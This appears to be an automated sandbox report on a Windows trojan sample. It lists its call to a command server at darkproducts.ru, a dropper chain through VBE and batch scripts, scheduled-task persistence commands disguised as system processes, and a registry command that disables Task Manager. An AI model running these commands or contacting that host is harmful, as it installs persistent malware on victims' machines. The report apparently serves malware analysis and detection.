Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru

Source: global traffic

DNS traffic detected: DNS query: 52952cm.darkproducts.ru

Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003485000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000382E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://52952cm.darkproX
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003606000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://52952cm.darkproXz
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000324D000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000352E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://52952cm.darkproducts.ru
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://52952cm.darkproducts.ru/
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000359A000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000340E000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000328D000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000363D000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000037BC000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003332000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000032C6000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003786000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003485000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000382E000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000034F3000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003606000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003369000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003444000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003567000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000371D000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://52952cm.darkproducts.ru/L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv7
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000363D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://52952cm.darkproducts.ruPm1
Source: driverDhcp.exe, 00000005.00000002.2057566472.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: 0_2_0086718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_0086718C

Source: C:\savesbrokerCrt\driverDhcp.exe	File created: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe			Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File created: C:\Windows\Offline Web Pages\f1490002b2f98f			Jump to behavior

Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0086857B	0_2_0086857B
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_008770BF	0_2_008770BF
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0088D00E	0_2_0088D00E
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0086407E	0_2_0086407E
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00891194	0_2_00891194
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00863281	0_2_00863281
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0086E2A0	0_2_0086E2A0
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_008802F6	0_2_008802F6
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00876646	0_2_00876646
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_008737C1	0_2_008737C1
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_008627E8	0_2_008627E8
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0088070E	0_2_0088070E
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0088473A	0_2_0088473A
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0086E8A0	0_2_0086E8A0
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00884969	0_2_00884969
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0086F968	0_2_0086F968
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00873A3C	0_2_00873A3C
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00876A7B	0_2_00876A7B
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00880B43	0_2_00880B43
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0088CB60	0_2_0088CB60
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00875C77	0_2_00875C77
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0087FDFA	0_2_0087FDFA
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0086ED14	0_2_0086ED14
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00873D6D	0_2_00873D6D
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0086BE13	0_2_0086BE13
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0086DE6C	0_2_0086DE6C
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00865F3C	0_2_00865F3C
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_00880F78	0_2_00880F78
Source: C:\savesbrokerCrt\driverDhcp.exe	Code function: 5_2_00007FF848F3AAA8	5_2_00007FF848F3AAA8
Source: C:\savesbrokerCrt\driverDhcp.exe	Code function: 5_2_00007FF848F33448	5_2_00007FF848F33448
Source: C:\savesbrokerCrt\driverDhcp.exe	Code function: 5_2_00007FF848F3A76D	5_2_00007FF848F3A76D
Source: C:\savesbrokerCrt\driverDhcp.exe	Code function: 5_2_00007FF848F32BD0	5_2_00007FF848F32BD0
Source: C:\savesbrokerCrt\driverDhcp.exe	Code function: 5_2_00007FF848F39D60	5_2_00007FF848F39D60
Source: C:\savesbrokerCrt\driverDhcp.exe	Code function: 5_2_00007FF848F3C570	5_2_00007FF848F3C570
Source: C:\savesbrokerCrt\driverDhcp.exe	Code function: 5_2_00007FF848F32BD0	5_2_00007FF848F32BD0
Source: C:\savesbrokerCrt\driverDhcp.exe	Code function: 5_2_00007FF848F39F38	5_2_00007FF848F39F38
Source: C:\savesbrokerCrt\driverDhcp.exe	Code function: 5_2_00007FF848F3AB6D	5_2_00007FF848F3AB6D
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F0AAA8	21_2_00007FF848F0AAA8
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F2DC28	21_2_00007FF848F2DC28
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F03448	21_2_00007FF848F03448
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F0CD78	21_2_00007FF848F0CD78
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F0A76D	21_2_00007FF848F0A76D
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F02BD0	21_2_00007FF848F02BD0
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F0AB6D	21_2_00007FF848F0AB6D
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F02BD0	21_2_00007FF848F02BD0
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F09D60	21_2_00007FF848F09D60
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F09F38	21_2_00007FF848F09F38
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 21_2_00007FF848F0C7C8	21_2_00007FF848F0C7C8
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 23_2_00007FF848F4AAA8	23_2_00007FF848F4AAA8
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 23_2_00007FF848F43448	23_2_00007FF848F43448
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 23_2_00007FF848F4A76D	23_2_00007FF848F4A76D
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 23_2_00007FF848F42BD0	23_2_00007FF848F42BD0
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 23_2_00007FF848F49D60	23_2_00007FF848F49D60
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 23_2_00007FF848F42BD0	23_2_00007FF848F42BD0
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 23_2_00007FF848F49F38	23_2_00007FF848F49F38
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Code function: 23_2_00007FF848F4AB6D	23_2_00007FF848F4AB6D
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Code function: 25_2_00007FF848F35E41	25_2_00007FF848F35E41
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Code function: 25_2_00007FF848F36C91	25_2_00007FF848F36C91
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Code function: 25_2_00007FF848F32371	25_2_00007FF848F32371
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Code function: 25_2_00007FF848F34D8D	25_2_00007FF848F34D8D
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Code function: 25_2_00007FF848F337A8	25_2_00007FF848F337A8
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Code function: 25_2_00007FF848F31CF9	25_2_00007FF848F31CF9
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Code function: 25_2_00007FF848F354FD	25_2_00007FF848F354FD
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Code function: 25_2_00007FF848F34300	25_2_00007FF848F34300

Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: String function: 0087ED00 appears 31 times
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: String function: 0087E360 appears 52 times
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: String function: 0087E28C appears 35 times

Source: driverDhcp.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: RuntimeBroker.exe.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: Mj6WEKda85.exe, 00000000.00000003.1998514560.0000000006FFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs Mj6WEKda85.exe
Source: Mj6WEKda85.exe, 00000000.00000003.1997778343.00000000066E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs Mj6WEKda85.exe
Source: Mj6WEKda85.exe, 00000000.00000003.1998166652.0000000006FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs Mj6WEKda85.exe
Source: Mj6WEKda85.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs Mj6WEKda85.exe

Source: Mj6WEKda85.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, HBRWHN6saMuh8516BYe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, HBRWHN6saMuh8516BYe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, RE5ISi04Oc21oFYSNW6.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, RE5ISi04Oc21oFYSNW6.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.Mj6WEKda85.exe.705bda5.1.raw.unpack, HBRWHN6saMuh8516BYe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.Mj6WEKda85.exe.705bda5.1.raw.unpack, HBRWHN6saMuh8516BYe.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.Mj6WEKda85.exe.705bda5.1.raw.unpack, RE5ISi04Oc21oFYSNW6.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.Mj6WEKda85.exe.705bda5.1.raw.unpack, RE5ISi04Oc21oFYSNW6.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.3.Mj6WEKda85.exe.705bda5.1.raw.unpack, z8I7JNPoGTQHGnYtv8o.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.Mj6WEKda85.exe.705bda5.1.raw.unpack, z8I7JNPoGTQHGnYtv8o.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, z8I7JNPoGTQHGnYtv8o.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.Mj6WEKda85.exe.6741da5.0.raw.unpack, z8I7JNPoGTQHGnYtv8o.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@29/14@1/1

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: 0_2_00866EC9 GetLastError,FormatMessageW,

0_2_00866EC9

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Code function: 0_2_00879E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00879E1C

Source: C:\savesbrokerCrt\driverDhcp.exe

File created: C:\Program Files (x86)\windows media player\ShellExperienceHost.exe

Jump to behavior

Source: C:\savesbrokerCrt\driverDhcp.exe

File created: C:\Users\Default\Pictures\RuntimeBroker.exe

Jump to behavior

Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2428:120:WilError_03
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\9a46fecda28d2820765302e6c0a254ad22b4f0d3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:764:120:WilError_03

Source: C:\savesbrokerCrt\driverDhcp.exe

File created: C:\Users\user\AppData\Local\Temp\UKzmYeaGeM

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\savesbrokerCrt\V4ZyqY05RylvaMusXQjEq4yt.bat" "

Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Command line argument: sfxname	0_2_0087D5D4
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Command line argument: sfxstime	0_2_0087D5D4
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Command line argument: STARTDLG	0_2_0087D5D4

Source: Mj6WEKda85.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Mj6WEKda85.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\savesbrokerCrt\driverDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\savesbrokerCrt\driverDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\savesbrokerCrt\driverDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\savesbrokerCrt\driverDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\savesbrokerCrt\driverDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\savesbrokerCrt\driverDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\savesbrokerCrt\driverDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\savesbrokerCrt\driverDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\savesbrokerCrt\driverDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Mj6WEKda85.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\Mj6WEKda85.exe

File read: C:\Users\user\Desktop\Mj6WEKda85.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Mj6WEKda85.exe "C:\Users\user\Desktop\Mj6WEKda85.exe"
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\savesbrokerCrt\V4ZyqY05RylvaMusXQjEq4yt.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\savesbrokerCrt\driverDhcp.exe "C:\savesbrokerCrt\driverDhcp.exe"
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uVyodHPItdaFNnFIblVMLhppqvOTKOu" /sc MINUTE /mo 11 /tr "'C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe'" /f
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uVyodHPItdaFNnFIblVMLhppqvOTKO" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe'" /rl HIGHEST /f
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uVyodHPItdaFNnFIblVMLhppqvOTKOu" /sc MINUTE /mo 8 /tr "'C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe'" /rl HIGHEST /f
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows media player\ShellExperienceHost.exe'" /f
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\ShellExperienceHost.exe'" /rl HIGHEST /f
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows media player\ShellExperienceHost.exe'" /rl HIGHEST /f
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\savesbrokerCrt\driverDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
